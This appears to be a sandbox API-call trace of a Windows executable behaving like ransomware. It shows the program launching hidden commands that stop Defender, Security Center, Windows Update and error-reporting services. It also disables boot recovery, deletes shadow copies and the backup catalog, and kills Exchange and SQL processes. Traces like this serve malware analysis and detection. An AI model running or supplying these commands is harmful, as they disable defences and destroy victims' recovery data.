0x0 [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleEx") returned 0x76d5c78f [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandle") returned 0x76d6cbfc [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeConditionVariable") returned 0x77c78456 [0078.172] GetProcAddress (hModule=0x76d30000, lpProcName="WakeConditionVariable") returned 0x77ce7de4 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="WakeAllConditionVariable") returned 0x77ca409d [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="SleepConditionVariableCS") returned 0x76dc4b32 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77c84892 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="SleepConditionVariableSRW") returned 0x76dc4b74 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWork") returned 0x76d5ee45 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="SubmitThreadpoolWork") returned 0x77cb8491 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWork") returned 0x77cad8e2 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0078.173] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0078.174] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x75670000 [0078.174] GetProcAddress (hModule=0x75670000, lpProcName="SleepConditionVariableCS") returned 0x76dc4b32 [0078.174] GetProcAddress (hModule=0x75670000, lpProcName="WakeAllConditionVariable") returned 0x77ca409d [0078.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x800) returned 0x6e6890 [0078.174] QueryPerformanceFrequency (in: lpFrequency=0x2cfef8 | out: lpFrequency=0x2cfef8*=100000000) returned 1 [0078.174] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfef0 | out: lpPerformanceCount=0x2cfef0*=19812941397) returned 1 [0078.174] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0078.175] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc6b957) returned 0x0 [0078.175] GetCurrentThread () returned 0xfffffffe [0078.175] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x2cfee4, lpExitTime=0x2cfeec, lpKernelTime=0x2cfeec, lpUserTime=0x2cfeec | out: lpCreationTime=0x2cfee4, lpExitTime=0x2cfeec, lpKernelTime=0x2cfeec, lpUserTime=0x2cfeec) returned 1 [0078.175] RtlInitializeSListHead (in: ListHead=0xccd768 | out: ListHead=0xccd768) [0078.177] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6e49d0) returned 0x80 [0078.177] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6e49d0, Size=0x100) returned 0x6e7098 [0078.179] RtlSizeHeap (HeapHandle=0x6d0000, Flags=0x0, MemoryPointer=0x6e7098) returned 0x100 [0078.179] RtlReAllocateHeap (Heap=0x6d0000, Flags=0x0, Ptr=0x6e7098, Size=0x200) returned 0x6e7098 [0078.179] RtlInitializeConditionVariable () returned 0xcce09c [0078.180] GetStartupInfoW (in: lpStartupInfo=0x2cfed8 | out: lpStartupInfo=0x2cfed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0078.180] FindResourceW (hModule=0x0, lpName=0x66, lpType=0xa) returned 0xccf0b8 [0078.184] LoadResource (hModule=0x0, hResInfo=0xccf0b8) returned 0xccf0f0 [0078.184] LockResource (hResData=0xccf0f0) returned 0xccf0f0 [0078.184] SizeofResource (hModule=0x0, hResInfo=0xccf0b8) returned 0x237 [0078.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x237) returned 0x6e9338 [0078.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e84f8 [0078.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8520 [0078.184] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e84f8 | out: hHeap=0x6d0000) returned 1 [0078.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x6e9578 [0078.186] GetEnvironmentVariableW (in: lpName="SYSTEMROOT", lpBuffer=0x6e9580, nSize=0xffff | out: lpBuffer="C:\\Windows") returned 0xa [0078.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x7095a8 [0078.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e84f8 [0078.186] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9578 | out: hHeap=0x6d0000) returned 1 [0078.186] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8520 | out: hHeap=0x6d0000) returned 1 [0078.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x6e9578 [0078.186] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x6e9580, nSize=0xffff | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0078.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x7095c8 [0078.186] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x709600 [0078.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7095a8 | out: hHeap=0x6d0000) returned 1 [0078.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9578 | out: hHeap=0x6d0000) returned 1 [0078.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x6e9578 [0078.187] GetEnvironmentVariableW (in: lpName="TMP", lpBuffer=0x6e9580, nSize=0xffff | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0078.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x48) returned 0x709658 [0078.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x7096a8 [0078.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7095c8 | out: hHeap=0x6d0000) returned 1 [0078.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9578 | out: hHeap=0x6d0000) returned 1 [0078.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8520 [0078.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8548 [0078.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8520 | out: hHeap=0x6d0000) returned 1 [0078.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x6e9578 [0078.187] GetEnvironmentVariableW (in: lpName="PROGRAMDATA", lpBuffer=0x6e9580, nSize=0xffff | out: lpBuffer="C:\\ProgramData") returned 0xe [0078.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x709700 [0078.187] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8520 [0078.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709658 | out: hHeap=0x6d0000) returned 1 [0078.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9578 | out: hHeap=0x6d0000) returned 1 [0078.187] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop wscsvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="sc stop wscsvc", lpProcessInformation=0x2cfe20*(hProcess=0x78, hThread=0x74, dwProcessId=0xaa4, dwThreadId=0x7cc)) returned 1 [0078.273] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x709658 [0078.273] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8548 | out: hHeap=0x6d0000) returned 1 [0078.273] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="sc stop WinDefend", lpProcessInformation=0x2cfe20*(hProcess=0x7c, hThread=0x80, dwProcessId=0xb2c, dwThreadId=0x7e8)) returned 1 [0078.278] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop wuauserv", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="sc stop wuauserv", lpProcessInformation=0x2cfe20*(hProcess=0x84, hThread=0x88, dwProcessId=0xae0, dwThreadId=0x81c)) returned 1 [0078.283] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop BITS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="sc stop BITS", lpProcessInformation=0x2cfe20*(hProcess=0x8c, hThread=0x90, dwProcessId=0x3d4, dwThreadId=0x86c)) returned 1 [0078.287] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop ERSvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="sc stop ERSvc", lpProcessInformation=0x2cfe20*(hProcess=0x94, hThread=0x98, dwProcessId=0xb68, dwThreadId=0x358)) returned 1 [0078.292] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="sc stop WerSvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="sc stop WerSvc", lpProcessInformation=0x2cfe20*(hProcess=0x9c, hThread=0xa0, dwProcessId=0xb5c, dwThreadId=0xb70)) returned 1 [0078.297] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x46) returned 0x709768 [0078.297] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709658 | out: hHeap=0x6d0000) returned 1 [0078.297] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x68) returned 0x7097b8 [0078.297] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709768 | out: hHeap=0x6d0000) returned 1 [0078.297] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x709828 [0078.297] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7097b8 | out: hHeap=0x6d0000) returned 1 [0078.297] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="cmd.exe /c bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x2cfe20*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xb48, dwThreadId=0xb60)) returned 1 [0078.305] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x2cfe20*(hProcess=0xac, hThread=0xb0, dwProcessId=0xa94, dwThreadId=0xb4c)) returned 1 [0078.794] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="cmd.exe /c vssadmin delete shadows /all /quiet", lpProcessInformation=0x2cfe20*(hProcess=0xb4, hThread=0xb8, dwProcessId=0xb1c, dwThreadId=0x544)) returned 1 [0078.803] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="cmd.exe /c wmic shadowcopy delete", lpProcessInformation=0x2cfe20*(hProcess=0xbc, hThread=0xc0, dwProcessId=0x5bc, dwThreadId=0x7bc)) returned 1 [0078.812] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="cmd.exe /c wbadmin delete catalog -quiet", lpProcessInformation=0x2cfe20*(hProcess=0xc4, hThread=0xc8, dwProcessId=0xa90, dwThreadId=0xa98)) returned 1 [0078.822] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="taskkill /f /im MSExchange*", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="taskkill /f /im MSExchange*", lpProcessInformation=0x2cfe20*(hProcess=0xcc, hThread=0xd0, dwProcessId=0x7e4, dwThreadId=0x71c)) returned 1 [0078.827] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="taskkill /f /im Microsoft.Exchange.*", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="taskkill /f /im Microsoft.Exchange.*", lpProcessInformation=0x2cfe20*(hProcess=0xd4, hThread=0xd8, dwProcessId=0x834, dwThreadId=0x854)) returned 1 [0079.332] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="taskkill /f /im sqlserver.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="taskkill /f /im sqlserver.exe", lpProcessInformation=0x2cfe20*(hProcess=0xdc, hThread=0xe0, dwProcessId=0xc2c, dwThreadId=0xc30)) returned 1 [0079.373] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="taskkill /f /im sqlwriter.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cfddc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cfe20 | out: lpCommandLine="taskkill /f /im sqlwriter.exe", lpProcessInformation=0x2cfe20*(hProcess=0xe4, hThread=0xe8, dwProcessId=0xc3c, dwThreadId=0xc40)) returned 1 [0079.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8548 [0079.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x709658 [0079.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8548 | out: hHeap=0x6d0000) returned 1 [0079.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709828 | out: hHeap=0x6d0000) returned 1 [0079.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709658 | out: hHeap=0x6d0000) returned 1 [0079.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9338 | out: hHeap=0x6d0000) returned 1 [0079.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xc49933, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf0 [0079.405] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x6e9338 [0079.405] GetCurrentProcess () returned 0xffffffff [0079.405] GetModuleBaseNameA (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x6e9338, nSize=0x104 | out: lpBaseName="mhtop32bit.exe") returned 0xe [0079.405] RtlTryEnterCriticalSection (CriticalSection=0xcce05c) returned 1 [0079.405] RtlWakeAllConditionVariable () returned 0x0 [0079.406] lstrcmpA (lpString1="mhtop32bit.exe", lpString2="mhtop32bit.exe") returned 0 [0079.410] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9338 | out: hHeap=0x6d0000) returned 1 [0079.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x260) returned 0x709be8 [0079.410] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x709be8, nSize=0x12c | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mhtop32bit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mhtop32bit.exe")) returned 0x3c [0079.410] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x709698 [0079.410] RtlTryEnterCriticalSection (CriticalSection=0xcce05c) returned 1 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e73f0 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6e9488 [0079.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e73f0 | out: hHeap=0x6d0000) returned 1 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6e94f0 [0079.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9488 | out: hHeap=0x6d0000) returned 1 [0079.411] RtlTryEnterCriticalSection (CriticalSection=0xcce05c) returned 1 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x78) returned 0x6e11e8 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e9548 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6e9488 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6e9338 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6e9370 [0079.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9548 | out: hHeap=0x6d0000) returned 1 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709e68 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8548 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6e93a8 [0079.411] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6e93e0 [0079.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0079.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x48) returned 0x709890 [0079.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x7098e0 [0079.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e93a8 | out: hHeap=0x6d0000) returned 1 [0079.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x709938 [0079.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8570 [0079.412] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709890 | out: hHeap=0x6d0000) returned 1 [0079.412] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x70a650 [0079.417] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x70a660, nSize=0xffff | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x7099a0 [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a680 [0079.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709938 | out: hHeap=0x6d0000) returned 1 [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x709938 [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x72a718 [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd8) returned 0x72a790 [0079.417] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a680 | out: hHeap=0x6d0000) returned 1 [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a680 [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a870 [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a8c8 [0079.417] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x138) returned 0x72a920 [0079.418] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a790 | out: hHeap=0x6d0000) returned 1 